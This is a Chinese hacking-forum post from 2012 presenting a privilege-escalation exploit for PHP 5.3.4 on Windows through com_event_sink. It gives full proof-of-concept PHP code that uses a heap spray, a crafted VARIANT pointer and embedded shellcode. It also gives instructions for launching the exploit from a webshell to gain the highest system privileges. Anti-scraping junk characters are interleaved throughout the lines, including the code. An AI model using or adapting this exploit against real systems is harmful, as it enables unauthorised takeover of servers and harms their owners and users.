找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2233|回复: 0
打印 上一主题 下一主题

PHP 5.3.4(WIN) COM_SINK权限提升漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 21:08:13 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中' E5 W5 z& j4 O/ S& g: ?" ~% D( O
! d: w3 S: R; r
测试方法如下:cmd /c x:\php\php.exe x:\test.php$ [' c8 S  N5 H1 A7 Q3 B

  M: x9 l! r  _7 E  f4 Z' j/ ~下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
' U) P! Y8 F" L. S' }- a! V+ P这里是两个测试的截图:8 R; O% C: {' e! {- v

8 O9 v5 E' `/ f* ^2 c! L% G( D
9 f3 _) k5 U) O
! V: S$ }3 ^5 C) ]) Y3 \6 {6 R
& o4 J5 B5 a- T
! w0 x+ p3 J/ H& N- r1 o4 V) @成功利用此漏洞的攻击者将获得系统的最高权限6 [- u2 P5 K# a9 i
* n  H' \! @- `" Q
5 W# d- @0 c1 j% M( L

0 l( ?% m0 s0 d
$ G7 j& ]& h/ b
% ^( W, R+ n" e. Y8 K关于漏洞分析稍后附上。一下是PoC代码:, u/ ]7 u' d9 x0 g) X! E, u9 x

# @9 j9 C" a* |. ?) P" ^1 |* n<?php
6 F* D$ {) ]6 r# [2 D: c//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞+ H& A& i$ K" c" U2 m. C0 S5 a
//$eip ="\x44\x43\x42\x41";
) L1 a! s+ C* R2 N/ C$eip= "\x4b\xe8\x57\x78";
: u, h: l4 v: U9 |2 d" ?$eax ="\x80\x01\x8d\x04";/ e+ d$ q2 q7 ^6 r8 p
$deodrant="";% X( K$ F5 [# F3 z% Y
$axespray = str_repeat($eip.$eax,0x80);
. \3 n+ \% S- @4 l//048d01904 P1 A+ {2 c8 Y" t6 m. H
echo strlen($axespray);, E5 D7 P' P% G2 c/ i) }% R
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";$ q& ]. q  }8 g/ T
echo "Silic Group Hacker Army - BlackBap.Org";: x; {  L, U& q" P2 p# B
//19200 ==4B32 4b000 h) R; d$ x, P' Z) q0 j# N
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}  a9 n( T+ o% B' V; [' |
$terminate = "T";
6 `% r! C1 t+ ~$u[] =$deodrant;$ {$ M0 ?2 e0 r
$r[] =$deodrant.$terminate;
* }  u) [7 {' W4 D% @% z( @$a[] =$deodrant.$terminate;
$ q! z3 q) c1 G# O2 \( _& N$s[] =$deodrant.$terminate;. Q5 r9 F- l/ t9 Q- \
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
- p' P& c/ d' Q* |1 V$ ?/ @6 L5 N$vVar = new VARIANT(0x048d0000+180);
, s6 ~% e0 j% _0 j. c//弹窗代码(Shellcode)- A+ S) j/ m* u
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";( M. S+ C* G* p! |* k
$var2 = new VARIANT(0x41414242);
, V1 W' f7 O3 z! H3 Ocom_event_sink($vVar,$var2,$buffer);5 K3 s5 C/ f, E2 j( ]
?>
% Z1 V( U/ x2 T( t, a3 M2 @8 s( u

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表